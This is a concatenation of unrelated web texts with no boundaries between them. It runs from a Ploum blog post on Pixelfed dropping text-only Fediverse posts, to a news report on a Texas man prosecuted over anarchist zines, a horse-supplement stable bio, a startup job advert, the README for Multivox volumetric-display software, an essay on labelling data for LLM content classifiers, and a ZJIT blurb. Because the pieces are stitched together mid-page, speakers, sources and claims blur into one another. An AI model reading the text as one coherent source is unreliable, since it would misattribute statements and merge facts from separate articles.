That’s because, despite its name, Pixelfed is NOT a true Fediverse application. It does NOT respect the ActivityPub protocol. Any Pixelfed user following my @ploum@mamot.fr account will only see a very small fraction of what I post. They may not see anything from me for months.
But why? Simple! The Pixelfed app has unilaterally decided not to display most Fediverse posts for the arbitrary reason that they do not contain a picture.
This is done on purpose and by design. Pixelfed is designed to mimic Instagram. Displaying text without pictures was deliberately removed from the code (it was possible in previous versions) in order to make the interface prettier.
This is unlike a previous problem where Pixelfed would allow unauthorised users to read private posts from unknowing fediverse users, which was promptly fixed.
In this case, we are dealing with a conscious design decision by the developers. Being pretty is more important than transmitting messages.
Technically, this means that a Pixelfed user P will think they follow someone but will miss most of that person’s content. Conversely, the sender, say a Mastodon user M, will believe that P has received the message, because P follows M.

This is a grave abuse of the protocol: messages are silently dropped. It stands against everything the Fediverse is trying to do: allow users to communicate. My experience with open protocols allows me to say that this is a critical problem and that it cannot be tolerated. Would you settle for a mail provider that silently dropped every email you receive containing the letter "P"?
The principle behind a communication protocol is to create trust that messages are transmitted. Those messages could, of course, be filtered by the users but those filters should be manually triggered and always removable. If a message is not delivered, the sender should be notified.
In 2025, I’ve read several articles about people trying the Fediverse but leaving it because "there’s not enough content despite following lots of people". Given the Pixelfed buzz in January, I’m now wondering: how many of those people were using Pixelfed and effectively missing most of the Fediverse’s content?
I cannot stress enough how important that problem is.
If Pixelfed becomes a significant actor, its position will gravely undermine the ActivityPub protocol to the point of making it meaningless.
Imagine a new client, TextFed, that never displays posts containing pictures. That makes as much sense as the opposite: lots of people, like me, find pictures disturbing, and some people cannot see pictures at all. So TextFed makes as much sense as Pixelfed. Once you have TextFed, you realise that TextFed and Pixelfed users can follow each other, comment on posts from Mastodon users, and exchange private messages, but they will never be able to see each other’s posts.

For a normal user, there’s no real way to understand that they are missing messages. And even if they do, it is very hard to work out that the cause is that the absence of pictures makes those posts "not pretty enough" for the Pixelfed developers. Worst of all: some Mastodon posts do contain a picture but are still not displayed in Pixelfed, because the picture comes from a link preview and was not manually uploaded. Try explaining that to friends who reluctantly followed you on the Fediverse. Have a look at any Mastodon account and try to guess which posts will be shown to its Pixelfed followers!

That’s not something any normal human is supposed to understand. For Pixelfed users, there’s no way to see that they are missing content. For Mastodon users, there’s no way to see that part of their audience is missing their content.

With trust in the protocol broken, people will revert to creating Mastodon accounts to follow Mastodon, Pixelfed accounts to follow Pixelfed, and TextFed accounts to follow TextFed. Even if it is not strictly needed, that’s the first intuition. It’s already happening around me: I’ve witnessed multiple people with a Mastodon account creating a Pixelfed account to follow Pixelfed users. They do this naturally because that’s what they were used to doing with Twitter and Instagram.

Congratulations, you have successfully broken ActivityPub and, as a result, the whole Fediverse. What Meta was not able to do with Threads, the Fediverse has done to itself. Because it was prettier.

Now, imagine for a moment that Pixelfed takes off (something I wish for, and which would be healthy for the Fediverse) and that interactions between Mastodon users and Pixelfed users are strong (also something I wish for). Imagine how many bug reports developers will receive about "some posts not appearing in my followers’ timelines" or "posts not appearing in my timeline".

This will put heavy pressure on the Pixelfed devs to implement text-only messages. At some point they will be forced to comply, having eroded trust in the Fediverse for nothing.

Once a major actor in a decentralised network starts to mess with the protocol, there are only two possible outcomes: either that actor loses steam, or it becomes dominant enough to impose its own vision of the protocol. In fact, there’s a third option: the whole protocol becomes irrelevant because nobody trusts it anymore.
But imagine that Pixelfed is now so important that they can stick to their guns and refuse to display text messages.
Well, there’s a simple answer: every other Fediverse application will start attaching an image to every post. Mastodon will probably gain a configurable "default picture to attach to every post so your posts are displayed in Pixelfed".

And now, without anyone having formally specified it, the ActivityPub protocol requires every message to have a picture.

That’s how protocols work. It has already happened: that’s how all mail clients ended up implementing the winmail.dat bug.
Sysadmins handling storage and bandwidth for the Fediverse thank you in advance.
Fortunately, we are not there yet. Pixelfed is still young. It can still go back to displaying every message an end user expects to see when following another Fediverse user.

I stress that this should be the default, not a hidden setting. Nearly all the Pixelfed users I’ve asked were unaware of the problem. They thought that if they followed someone on the Fediverse, they would, by default, see all of that person’s public posts.

There’s no negotiation. No warning on the Pixelfed website will be enough. In a federated communication system, filters should be opt-in. In fact, that’s what older versions of Pixelfed did.

But while text messages MUST be displayed by default (MUST as in an RFC), they can still be displayed as less important. For example, one could imagine showing them smaller, or whatever you find pretty, as long as it is clear that the message is there. I trust the Pixelfed devs to be creative here.
The Fediverse is growing. The Fediverse is working well. The Fediverse is a tool that we urgently need in those trying times. Let’s not saw off the branch on which we stand when we need it the most.
UPDATE: Dansup, Pixelfed Creator, replied the following on Mastodon:
We are working on several major updates, and while I believe that Pixelfed should only show photo posts, that decision should be up to each user, which we are working to support.
I’m Ploum , a writer and an engineer. I like to explore how technology impacts society. You can subscribe by email or by rss . I value privacy and never share your address.
I write science-fiction novels in French . For Bikepunk , my new post-apocalyptic-cyclist book, my publisher is looking for contacts in other countries to distribute it in languages other than French. If you can help, contact me !
For five months, Daniel Sanchez Estrada was the prisoner of a government that has branded him an “ Antifa Cell operative .” He was accused of moving a box of anarchist zines from one suburb of Dallas to another after a protest against U.S. Immigration and Customs Enforcement.
On the day before Thanksgiving, he was released without warning or explanation. He walked out to a jail parking lot relishing the fresh air — and watching over his shoulder.
During the week that followed, Sanchez Estrada savored his time with family members and worried that his release might have been an accident. Apparently, he was right.
“I just have to go through this process. It’s necessary to show that I’m not the person they say I am.”
On Thursday, Sanchez Estrada turned himself in to await a trial that could be months away.
It was another swerve in the case of a man who has been demonized by the federal government for actions he took after a protest against Donald Trump’s immigration crackdown . Civil liberties advocates have decried the case against him as “guilt by literature.” (The U.S. Attorney’s Office for the Northern District of Texas declined to comment, and the Federal Bureau of Prisons did not immediately respond to a request.)
In a Wednesday night interview during his final hours of freedom, Sanchez Estrada said the decision to voluntarily surrender himself was gut-wrenching.
“As scary as it is, I’m innocent,” he said. “I just have to go through this process. It’s necessary to show that I’m not the person they say I am. I’m not fleeing. I’m not hiding. Because I’m innocent. I haven’t done anything.”
Sanchez Estrada spoke to The Intercept outside an ice cream shop in an upscale shopping mall in Fort Worth, Texas. He was set to turn himself back in to jail 16 hours after the interview — but before that, he was treating his 12-year-old stepdaughter to sweets during his first meeting with her as a free man since his arrest in July.
Prosecutors allege that Sanchez Estrada’s wife, Maricela Rueda, attended a chaotic protest outside ICE’s Prairieland Detention Center on July 4 that ended with a police officer wounded by gunfire. A separate defendant is the sole person accused of firing a gun at the officer.
The gathering outside the Alvarado, Texas, detention center happened in the context of a huge rise in the number of immigrants detained under Trump , from 39,000 in January to 65,000 in November, which has been accompanied by reports of dire conditions inside .
Supporters of the Prairieland defendants say the protesters hoped to cause a ruckus with fireworks in a show of solidarity. The government has accused members of what it dubs the “North Texas antifa cell” of rioting and attempted murder.
No one claims that Sanchez Estrada was present at the protest. Instead, he is accused of moving anarchist zines from his parents’ house to another residence near Dallas on July 6 after Rueda called him from jail. Sanchez Estrada was arrested when the move was spotted by an FBI surveillance team, according to the government.
“My charge is allegedly having a box containing magazine ‘zines,’ books, and artwork.”
Prosecutors said the zines contained “anti-law enforcement, anti-government and anti-Trump sentiments.” In a statement made outside of his interview, Sanchez Estrada said that possession of such items is clearly protected by the First Amendment.
“My charge is allegedly having a box containing magazine ‘zines,’ books, and artwork,” Sanchez Estrada said. “Items that should be protected under the First Amendment ‘freedom of speech.’ If this is happening to me now, it’s only a matter of time before it happens to you.”
Civil liberties groups such as the Freedom of the Press Foundation have denounced his case as “ guilt by literature.” They warn that his could be the first of many such prosecutions in the wake of a presidential memo from Trump targeting “antifa” and other forms of “ anti-Americanism .”
The purported “North Texas antifa cell” has been cited by FBI Director Kash Patel and others as a prime example of a supposed surge in the number of attacks on ICE officers — although a recent Los Angeles Times analysis found that unlike the incident in Texas, most of those alleged attacks resulted in no injury.
Sanchez Estrada faces up to 20 years on counts of corruptly concealing a document or record and conspiracy to conceal documents. The stakes are higher for him than other defendants because he is a green card holder, which ICE spotlighted in a social media post that included his picture and immigration history.
Sanchez Estrada also worries about the fate of his wife, who faces life imprisonment if convicted. She pleaded not guilty in an arraignment Wednesday. The case is currently set for trial on January 20.
“I want to be very clear. I did not participate. I was not aware nor did I have any knowledge about the events that transpired on July 4 outside the Prairieland Detention Center,” Sanchez Estrada said in his statement. “My feeling is that I was only arrested because I’m married to Mari Rueda, who is being accused of being at the noise demo showing support to migrants who are facing deportation under deplorable conditions.”
Sanchez Estrada said that he spent his months in jail anguishing over how his stepdaughter would be affected and how his parents, for whom he is the primary supporter, would make ends meet.
A nature lover who peppers his speech with references to “the creator,” Sanchez Estrada said one of the toughest things about being in jail was not being able to breathe fresh air or watch the sun set.
He said he was immediately suspicious when jail officers told him that he was being released.
“I thought they would be waiting in the parking lot to arrest me.”
“You normally would assume the worst when you’re in there. I just did not believe them. I thought they would be waiting in the parking lot to arrest me,” he said.
Soon, however, Sanchez Estrada was eating vegan tacos and spending time with friends and family.
“It is something just beautiful to see — everyone rooting for you,” he said.
He fears what could happen when he returns to custody. Still, he will have a reminder of his brief return to life on the outside: freshly inked tattoos of a raccoon and an opossum.
“They’ve been here even before people,” he said. “They’re wild animals, and they’re beautiful.”
Update: December 4, 2025, 12:58 p.m. ET
This story has been updated to reflect that, after publication, the U.S. Attorney’s Office for the Northern District of Texas declined to comment.
Sandra founded Lindely Stables in 2019, but her riding career began in earnest in 2002, when she was selected for the Danish Pony National Team and helped win gold at the Nordic Championships. In 2005 she represented Denmark at the European Show Jumping Championships for horses.

She has competed in many national competitions as well as international competitions in classes up to 145 cm.

Besides being a skilled show jumper who often competes herself, she has specialised in starting young horses, training, breeding and nutrition, all on the horse's terms and at the horse's pace.

In 2024 her home-bred Baldur developed serious problems with nervousness, particularly around competitions. Every product, training method, treatment and piece of advice from the vet was tried without effect. It was only when she came across the Dutch Librium that the code was cracked.

Librium turned out to be liquid calm for Baldur, who quickly regained his great joy in riding and competing!

As a result, Sandra started a collaboration with Lau Bjørn Jensen, and together they became importers of Prenimal's entire Prequine range of top-quality supplements for horses. Every supplement contributes either to the horse's health or its quality of life, and the mission is clear:

Every horse should have the chance to live its best horse life.
Converge is building the definitive Growth OS : We help DTC Growth teams understand which marketing efforts drive profitable growth . We are the only platform combining best-in-class tracking with blended reporting and multi-touch attribution.
Our unique positioning has led to rapid growth in both number and size of customers. One of the secrets of our growth is that we invest heavily in customer success . Whereas our competitors see success as a cost center, we take pride in delivering expert martech and marketing reporting support throughout the entire customer lifecycle and we compensate accordingly .
Our strategy is paying off, with 200+ paying customers (including some of the most famous DTC brands) and strong investor backing. We are now looking for a senior Technical Customer Success Manager to help us scale to $10M+ ARR .
Be a marketing measurement expert : Advise customers on attribution, conversion tracking, and reporting strategies, positioning yourself as a trusted technical partner.
Technical support : Investigate and resolve conversion tracking and attribution issues reported through all channels, including email, Slack and in-app.
Onboard new customers : Own the customer onboarding end-to-end, driving them from initial implementation to real and lasting success.
Drive renewals : Take full ownership of renewal conversations, mitigating churn risk and implementing proactive retention strategies.
Champion customer needs : Surface trends and insights from collected customer feedback to the team at large to inform product roadmap.
Activate: Maximize the adoption of our product features and provide proactive, regular recommendations to get more out of the platform.
Expand customer contracts : Identify and execute expansion opportunities to increase account value.
Lead strategic projects : Improve the support experience and feature adoption.
Have strong martech experience : Google Tag Manager, Meta Events Manager, Google Consent Mode and other pieces of the martech stack have no secrets for you.
Are curious and technical : You love understanding complex products deeply. Bonus points if you already love JS debugging, sifting through network requests or reasoning over attribution logic.
Thrive in ambiguity : You enjoy building processes from scratch and figuring things out without a playbook.
Are commercially minded : You know how to uncover customer needs and tie solutions to real business value.
Have advertising experience: You speak the language of a growth team, and have experience with Ads Managers, attribution and creative strategy.
Do not want to become an expert : Our customers choose us because we deeply understand their technical challenges.
Prefer certainty over upside : There are no rigid and limited responsibilities here - we grant a lot of agency and expect a lot of accountability.
Don't like working hard : This role demands more commitment and agency than a typical success role.
Prefer remote over in-person : We believe being in-person helps us move faster.
Compensation: $155k - $217k + equity: 0.1% - 0.25%.
Career-defining opportunity to build the U.S. success function and work with the world's best DTC growth teams.
Private health, dental, and vision insurance.
Pension & 401k contributions.
Opportunity to work on a complex product that customers love - 35% of our users use us daily (!)
Application : We're looking to see how your skills and experience align with our needs.
Intro interview (30-min): Our goal is to learn more about what you are looking for in your next role, explore your motivations to join our team, why you would be a great fit, and answer questions about us.
Culture interview (45-min): We will walk through your experience and background in detail.
Case interview (1 hour): We will simulate a real customer situation.
Offer : If everyone’s aligned, we’ll move quickly to make you an offer.
(*) can be done in 2 days, just flag to us that you want to do it fast.
We operate a >$1M ARR business with >200 customers with a team of just 9 people .
Why you should care:
You will not find a startup with this level of product-market-fit where you can join as employee #10.
We compete with Segment, Fivetran, Google Tag Manager, Rockerbox, Looker, just to name a few.
Why you should care:
Other startups give you ownership of a feature. At Converge, you get ownership over an entire product .
Converge sees 35% of its users daily , while this is only 13% for the average SaaS company.
Why you should care:
Our customers will be excited by every feature you ship, and your impact will be felt immediately .
We collect around 20M customer interactions per day and process ~$3B in GMV annually .
Why you should care:
Even though you join early, this job comes with real engineering challenges .
All co-founders have written code that has run in production as part of Converge.
We closed our first publicly traded company during our YC batch from our living room in San Francisco.
Thomas and Tiago (Founding Engineer) worked together when Thomas was just an intern.
Michel (Customer Success) was responsible for most of the incoming Converge Support tickets in his previous job as a freelance tracking consultant.
Thomas and Jan were best friends in high school, and Jan and Jerome met in their first year of college.
This is the code I currently use to drive my volumetric displays .
It supports two closely related devices, which are configured in the src/driver/gadgets directory:
Rotovox has a higher vertical resolution and better horizontal density; Vortex is brighter and has a higher refresh rate.
The 3D printable parts for Vortex are available here .
This code was originally written for a single display, and the device specific code was later somewhat abstracted out to support a second similar gadget. There are assumptions about the hardware that are pretty well baked in:
The GPIO mappings and panel layout are defined in src/driver/gadgets/gadget_<name>.h . GPIO is via memory mapped access - if you're using a different model of Pi you'll need to change BCM_BASE in the GPIO code. I haven't tested this, and you should probably assume it doesn't work.
Input is via a bluetooth gamepad - I've been using an Xbox controller, and the input system is based on the default mapping for that.
Audio out is also via bluetooth. I haven't had success with the higher quality codecs, but the headset protocol works.
There are two parts to this code - the driver, which creates a voxel buffer in shared memory and scans its contents out in sync with rotation, and the client code which generates content and writes it into the voxel buffer. Both driver and client code are designed to run on the same device, a Raspberry Pi embedded in the hardware and spinning at several hundred RPM. There is a demo included in the Python directory which streams point clouds from a PC over wifi to the device, but fundamentally it's designed as a self contained gadget, like an alternate timeline Vectrex. A bluetooth gamepad is used to control the demos.
├── src
│ ├── driver
│ │ ├── gadgets -- the different volumetric display configurations
│ │ │ └──
│ │ └── vortex.c -- driver code - creates a voxel buffer in shared memory,
│ │ and handles scanning it out to the led panels in sync with
│ │ the rotation
│ ├── simulator
│ │ └── virtex.c -- software simulator - presents the same voxel buffer as
│ │ the driver would, but renders the contents into an X11 window
│ │
│ ├── multivox -- front end / launcher for the various volumetric toys
│ │ └──
│ ├── platform -- common client code
│ │ └──
│ └── toys -- a collection of volumetric demos using the shared voxel buffer
│ ├── eighty -- multiplayer light cycles
│ ├── fireworks.c -- cheesy first demo
│ ├── flight.c -- some kind of 70s scifi thing
│ ├── tesseract.c -- a 4D cubube
│ ├── viewer.c -- viewer for .obj and .png files
│ └── zander -- lander/zarch/virus-esque
├── python
│ ├── calibration.py -
│ ├── grid.py -- some pattern generators, useful when calibrating the device
│ ├── colourwheel.py -
│ ├── obj2c.py -- tool for embedding .obj models in a header file
│ ├── pointvision.py -- receive point clouds streamed from vortexstream.py
│ └── vortexstream.py -- stream point clouds to pointvision.py
└── README.md -- you are here
On the Raspberry Pi, clone the repository:
git clone https://github.com/AncientJames/multivox.git
Configure the project for your hardware:
cd multivox
mkdir build
cd build
cmake -DMULTIVOX_GADGET=vortex ..
cmake --build .
First, the driver has to be running:
When invoked from the command line it periodically outputs profiling information (frame rate, rotation rate), and accepts keyboard input for various diagnostics:
| Key | Effect |
|---|---|
| esc | Exit |
| b | Bit depth - cycles through 1, 2 or 3 bits per channel. Higher bit depths result in lower refresh rates |
| u | Uniformity - cycles through different strategies for trading off brightness against uniformity |
| t | Trails - adjusts how far back to accumulate skipped voxels when the rotation rate is too high for the refresh rate |
| l | Lock - whether to adjust the rotation sync to keep it facing one way |
| d D | Drift - rotisserie mode. Introduces some explicit drift to the rotation sync |
| p | Panel - selectively disable the panels |
| xyz | Axis - When the display isn't spinning, it shows an orthographic view. This lets you choose the axis |
While that's running, try one of the toys:
The viewer takes a list of .obj and .png files as arguments. You can scale, rotate and so on using the gamepad, and it also accepts keyboard input when run remotely from the command line.
./viewer ~/Multivox/models/*.obj
| Control | Key | Effect |
|---|---|---|
| esc | Exit | |
| LB/RB | [ / ] | Cycle through models |
| A | Walkthrough / Orbit | |
| X | Zoom to fit | |
| Y | Toggle wireframe |
If you don't have a physical volumetric display, there's a simulator, virtex , which you can run in place of vortex . It exposes the same voxel buffer in shared memory, but renders the contents using OpenGL in an X11 window.
Run without command line arguments, it creates a display compatible with the currently configured gadget, but there are some options that let you experiment with different geometries:
| Option | Effect |
|---|---|
| -s X | slice count - the number of vertical slices per revolution |
| -o X X | offsets - distance the front and back screens are offset from the axis, as a fraction of screen radius |
| -b X | bits per channel (1 - 3) |
| -w X Y | panel resolution |
| -g X | scan geometry - radial or linear. Linear looks better, but it's a lot harder to build. |
An idealised device with linear scanning and 3 bits per channel can be invoked like this:
./virtex -g l -s 128 -w 1280 1280 -b 3
The simulator is fill rate intensive; if you're running it on a Raspberry Pi you'll probably want to reduce the slice count.
If you want it to start up automatically on boot, you can install vortex as a service, and set multivox to run on startup. First install everything to its default location ~/Multivox :
make install
This will build the executable files and copy them into the destination directory, as well as creating .mct files in ~/Multivox/carts for the built-in toys.
Create the driver service:
sudo nano /usr/lib/systemd/system/vortex.service
and fill in the following information:
[Unit]
Description=Vortex Display Driver
After=multi-user.target
[Service]
ExecStart=/home/pi/Multivox/bin/vortex
[Install]
WantedBy=multi-user.target
Then start it up:
sudo systemctl daemon-reload
sudo systemctl enable vortex.service
The driver assigns itself to core 3 - you can add isolcpus=3 to the end of /boot/cmdline.txt to ensure it's the only thing running on that core.
You'll also want the launcher to start up on boot. Edit your crontab (for example with crontab -e ) and add the line:
@reboot /home/pi/Multivox/bin/multivox
If everything goes smoothly, when you turn on the device it will boot up into Multivox . This is a fantasy console which acts as a launcher for all the games and demos you run on the hardware. The bundled toys are automatically installed in the ~/Multivox/carts/ directory as .mct files, and external apps can be launched by adding a .mct file containing its command, path and arguments.
Each .mct file appears as a cartridge in the Multivox front end. They should each have a label on the side; at the moment, all you can do to distinguish between them is change their colour in the .mct file.
When you exit an app back to the launcher, it saves a snapshot of the voxel volume, and this gives a preview of what you'll see when you launch a cart. This means there are two competing representations of the same information, and any future work on the front end will probably start with overhauling the entire approach.
Some basic UI for controls such as changing bit depth, rebooting and so on would also be a boon.
| Control | Effect |
|---|---|
| LB/RB | Cycle through carts |
| A | Launch cart |
| ⧉ | Exit / resume running cart |
| △ ▽ | Change bit depth |
| ☰ x5 | Power off |
You are a machine learning engineer at Facebook in Menlo Park. Your task: build the best butt classification model, which decides if there is an exposed butt in an image.
The content policy team in D.C. has written country-specific censorship rules based on cultural tolerance for gluteal cleft—or butt crack, for the uninitiated.
A PM on your team writes data labeling guidelines for a business process outsourcing firm (BPO), and each example in your dataset is triple-reviewed by the firm's outsourced team to ensure consistency. You skim the labels, which seem reasonable.
import torch
import pandas as pd
from torch.utils.data import DataLoader, TensorDataset
from sklearn.model_selection import train_test_split

# Load the triple-reviewed labels from the BPO.
df = pd.read_csv("gluteal_cleft_labels.csv")
X = df.drop("label", axis=1).values
y = df["label"].values

# Hold out 20% of the labeled data as a test set.
x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
You decide to train a CNN: it'll be perfect for this edge detection task. Two months later, you've cracked it. Your model goes live, great success, 92% precision, 98% recall. You never once had to talk to the policy team in D.C.
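For concreteness, the kind of CNN the narrator reaches for might look like the sketch below. This is purely illustrative: the class name, the 3x128x128 input size, and the random stand-in batch are assumptions, not the model described in the story.

import torch
import torch.nn as nn

# A minimal sketch of a binary image classifier, assuming images arrive as
# 3x128x128 tensors. Shapes and layer sizes here are arbitrary choices.
class ButtClassifier(nn.Module):
    def __init__(self):
        super().__init__()
        self.features = nn.Sequential(
            nn.Conv2d(3, 16, kernel_size=3, padding=1), nn.ReLU(), nn.MaxPool2d(2),
            nn.Conv2d(16, 32, kernel_size=3, padding=1), nn.ReLU(), nn.MaxPool2d(2),
        )
        # Two 2x poolings take 128x128 down to 32x32, with 32 channels.
        self.head = nn.Sequential(nn.Flatten(), nn.Linear(32 * 32 * 32, 1))

    def forward(self, x):
        return self.head(self.features(x))  # raw logits; sigmoid at inference time

model = ButtClassifier()
loss_fn = nn.BCEWithLogitsLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)

# One illustrative training step on a random batch standing in for real images.
images = torch.randn(8, 3, 128, 128)
labels = torch.randint(0, 2, (8, 1)).float()
optimizer.zero_grad()
loss = loss_fn(model(images), labels)
loss.backward()
optimizer.step()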
Another email: Policy has heard about LLMs and thinks it's time to build a more "context-aware" model. They would like the model to understand whether there is sexually suggestive posing, sexual context, or artistic intent in the image.
You receive a 10 page policy doc. The PM cleans it up a bit and sends it to the BPO. The data is triple reviewed, you skim the labels, and they seem fine.
You make an LLM decision tree, one LLM call per policy section, and aggregate the results. Two months pass. You are stuck at 85% precision and recall, no matter how much prompt engineering and model tuning you do. You try going back to a CNN, training it on the labels. It scores 83%.
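Sketched out, that per-section approach might look something like the snippet below. The section names, rule text, and call_llm function are all invented placeholders for illustration, not Meta's actual policy or tooling.

# One LLM call per policy section, aggregated into a single decision.
# `call_llm` is a hypothetical placeholder for whatever model client you use.
POLICY_SECTIONS = {
    "suggestive_pose": "Per section 3, is the pose sexually suggestive?",
    "sexual_context": "Per section 4, is the surrounding context sexual?",
    "artistic_intent": "Per section 7, is there clear artistic intent?",
}

def call_llm(question: str, image_description: str) -> bool:
    # Placeholder: imagine this sends the question and the image (or a
    # description of it) to a model and parses a yes/no answer.
    return False

def violates_policy(image_description: str) -> bool:
    votes = {name: call_llm(q, image_description) for name, q in POLICY_SECTIONS.items()}
    # Aggregate: flag if either flagging rule fires, unless the
    # artistic-intent carve-out applies.
    return (votes["suggestive_pose"] or votes["sexual_context"]) and not votes["artistic_intent"]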
Your data science spidey-sense tingles. Something is wrong with the labels or the policy.
You email the policy team, sending them the dataset and results.
The East Coast Metamates say they looked at 20 of the labels. 60% were good, 20% were wrong, 20% were edge cases they hadn’t thought of.
The butt model lives to fight another day, or at least until these discrepancies get sorted out.
The butt model is still in production… What went wrong?
It doesn't matter if the task is content policy, sales chatbots, legal chatbots, or AI automation in any other industry.
Test Split: Any task complicated enough to require an LLM will need policy expert labels. [1] To detect nudity, outsourced labels will do, but to enforce a 10 page adult policy, you need the expert. Experts have little time: they can't give you enough labels to run your high scale training runs. You can't isolate enough data for a test set without killing your training set size. On top of that, a 10 page policy comes with so much gray area that you can’t debug test set mistakes without looking at test set results and model explanations.
Train Split: You no longer need a large, discrete training set because LLMs often don't need to be trained on data: they need to be given clear rules in natural language, and maybe 5-10 good examples. [2] Today, accuracy improvements come from an engineer better understanding the classification rules and better explaining them to the model, not from tuning hyperparameters or trying novel RL algorithms. Is a discrepancy between the LLM result and the ground truth due to the LLM’s mistake, the labeler’s mistake, or an ambiguous policy line? This requires unprecedented levels of communication between policy and engineering teams.
Recommending a New Split: Don’t train the LLM on any of the dataset. Address the inevitable biases with evaluation on blind, unlabeled data. [3] To understand why this is the best approach, we need to dive deeper into why the train-test split paradigm doesn't suffice.
Policy Experts write abstract rules. For older classification tasks, the rules had to be simple, because simple was all that models could do. Are there guns in the image? Is there a minor in the image? Complicated tasks are harder to pin down.
Take these examples. Sexually suggestive? Artistic expression? Sufficient censorship?
Source: Lorde's album covers from Vice.com, where you can find discussion of what is visible or not in each photo.
Most policy documents are not well-kept. A content policy is typically simplified, operationalized, and sent to outsourced teams to enforce. Edge cases and discrepancies found in India never make it back to policy teams in DC, so abstract rules are rarely pinned down.
In production, we see 15-20% false positive rates on BPOs. Half are attributable to human error, half to policy gray area.
To resolve edge cases, labeling tasks require an expert's time. BPO agents can eyeball how much butt is visible, but struggle with what is "sexually suggestive." BPO agents are low-wage workers in countries like India or the Philippines, and may have different definitions of "sexual context" than the policy writers intended. The costs of training them are often prohibitive at scale.
Using in-house agents is not sufficient for training data, either, as small alignment issues in the dataset cause large issues in production: If internal agents are 95% accurate (pretty good), the ceiling for the LLM's performance is 95%. If the LLM gets 95% of those labels right, its accuracy will be 90%.
Hard classification tasks have high rates of expert disagreement. Ask two people if there's a gun in an image, and odds are they'll agree. Ask two policy experts whether a pose is sexually suggestive per their definition, and you will start a one-hour debate. If two experts only agree 95% of the time, labeling is then handed off to internal agents at 95% accuracy, and the LLM matches 95% of those labels, you are down to roughly 86% LLM accuracy (0.95³ ≈ 0.86).
Language models see details in data that even experts miss. LLMs read every word of the product description. They scrutinize every image for a single pixel of gluteal cleft. They see gluteal cleft through sheer clothing, in low opacity, and in the bottom left corner of the back of a t-shirt. Even if experts have reviewed the data, there must be a re-review and feedback loop to check what the LLM has flagged.
Since labels are often wrong or ambiguous, you cannot keep the test set blind. If the LLM is right and the labels are wrong, either because the expert missed something, the policy was ambiguous, or the outsourced labeler was wrong, you have to look at the test set results to check. Moreover, you need to review the LLM's explanation while reviewing the new data to see what it found, confounding any true "blind" test. [4]
In production, we see anywhere from 15-30% error rates in data considered "golden sets" by operations teams.
Given the need for expert input and policy clarifications, you cannot maintain large enough training sets to keep the test set blind. For a simple policy, maintaining good labeled data is straightforward. However, attempting to integrate an LLM is often the first time a policy expert will be asked to scrutinize their rules and labels. Their time is valuable, and they will not be able to bring their expertise to a large dataset.
Complicated policies change, especially under scrutiny, and re-labeling affected examples is time-consuming. A leaner training set will be more valuable than a larger one in the long run.
Since these classification tasks are so complex, you can only "debug" the model by looking at the input and its explanations side-by-side. A policy might have dozens of rules and thousands of possible inputs, creating a fat-tail of model mistakes. Unlike traditional machine learning, where you fix mistakes by changing the design or hyperparameters of your model, you fix LLM mistakes by changing the prompt. You can directly fix a mistake (e.g. by telling the model "do not consider spreading legs fully clothed to be sexually suggestive"), so keeping mistakes hidden only hurts accuracy. [5]
You still need to run blind tests: QA the models on new data. Organizations end up running their models in "shadow mode" on production data, creating test examples without taking real-world actions. Here, you'll likely need an in-house agent to review the examples, then forward edge cases to a policy expert.
The Policy and Engineering Teams Need to be in Direct, Frequent Communication. The SF-DC split doesn't work anymore. Resolving edge cases and, in many cases, changing the policy to reflect patterns identified in the data requires collaboration.
Experts have historically not needed to look at the data—seen as a low-status task—but it is the only way to achieve high accuracy. This is an unsolved problem in many large organizations that blocks LLM integrations.
Most importantly, LLMs do not "train" on data the way traditional classifiers do, so there is often no need to have a "training" set, either. LLMs can enforce complicated, natural language rules because they can take natural language inputs, not because they can learn patterns from thousands of training examples. LLM accuracy is often a prompting task, not a design-your-RL-pipeline task. [1]
If you want a model to classify whether animals are endangered species, don't give it 1,000 examples of elephant ivory, 100 examples of every species on the CITES list, and 1,000 pictures of your non-endangered dog, give it the list of species names as inputs.
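As a sketch of what "give it the list as input" means in practice (species names truncated to a few illustrative entries, call_llm again a hypothetical stand-in for a real client):

# Give the model the rule and the list, not thousands of labeled examples.
CITES_EXAMPLES = ["African elephant", "hawksbill turtle", "pangolin"]  # truncated, illustrative

def call_llm(prompt: str) -> str:
    return "no"  # hypothetical placeholder for a real model call

def flags_endangered_species(listing_text: str) -> bool:
    prompt = (
        "Does this product listing offer any of the following species or their parts? "
        f"Species: {', '.join(CITES_EXAMPLES)}.\n\n"
        f"Listing: {listing_text}\nAnswer yes or no."
    )
    return call_llm(prompt).strip().lower().startswith("yes")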
The "training" step for language models has to be policy alignment, not heating up GPUs. Since the data will always be flawed and the test set won't be blind, the machine learning engineer's priority should be spent working with policy teams to improve the data. That means surfacing edge cases and policy gray areas, clarifying policy definitions, and leveraging LLM outputs to find more discrepancies until data is high-quality and policy is clear.
In production, this is an ongoing process, as LLMs will always surface new interesting cases and policies will continue to change. Policies and enforcement are better for this feedback loop: it enables consistent, scaled enforcement platform-wide.
This is a paradigm shift that many machine learning teams, and enterprises as a whole, have not yet embraced. It requires a complete change in how we approach classification tasks.
If this is the road to automation, is it even worthwhile? The process described above, while arduous, is the shortest route to consistent policy enforcement to date. Before LLMs, running a successful quality assurance program would be prohibitively expensive. Retraining human agents takes far longer than retraining LLMs. Policy experts have historically never been owners in quality assurance processes, but now can be.
To save a little time, an in-house human agent might do a first review of the results, then a policy expert can review only the discrepancies. We find this tradeoff works well in production.
What are the implications for leveraging LLMs for tasks which do not have binary classifications ? Can an LLM be a lawyer if this much work is required to align, evaluate, and test models? Will an LLM ever ~know what you mean~ and skip all these alignment steps?
One core problem with the LLM architecture is that the model doesn't know when it is wrong. Model improvements over the past few years mean the LLM is right more often, but when it is wrong, it doesn't have an outlet.
This is a perennial machine learning problem: a model does not know what is "out of distribution" for itself.
Until that problem is solved, there will have to be an engineer in the loop improving and testing the model, and a policy expert evaluating the results. You can do this for complicated tasks like writing a patent application, but you have to be rigorous, define a rubric, curate expert data, and regularly evaluate model outputs. Calculating accuracy of each "training run" will never be as easy as checking if model_output == ground_truth, and will require a human in the loop. These complex tasks are far more lucrative than binary classification, and smart people are working on them.
Not everybody will take this rigorous approach, and as models improve, they might not have to. Until then, the highest leverage way to spend your time in 2026 will be looking closely at your data, cleaning your data, and labeling your data.
ZJIT adds support for Iongraph, which offers a web-based, pass-by-pass viewer with a stable layout, better navigation, and quality-of-life features like labeled backedges and clickable operands.
I’m an intern on the ZJIT team for the fall term. I also have a rather bad habit of being chronically on lobste.rs .
